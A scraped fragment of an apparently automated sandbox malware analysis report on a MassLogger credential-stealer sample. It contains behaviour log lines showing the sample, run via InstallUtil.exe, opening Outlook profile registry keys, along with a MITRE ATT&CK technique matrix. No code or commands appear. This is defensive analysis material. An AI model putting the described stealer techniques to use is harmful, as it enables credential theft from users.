Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exe

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement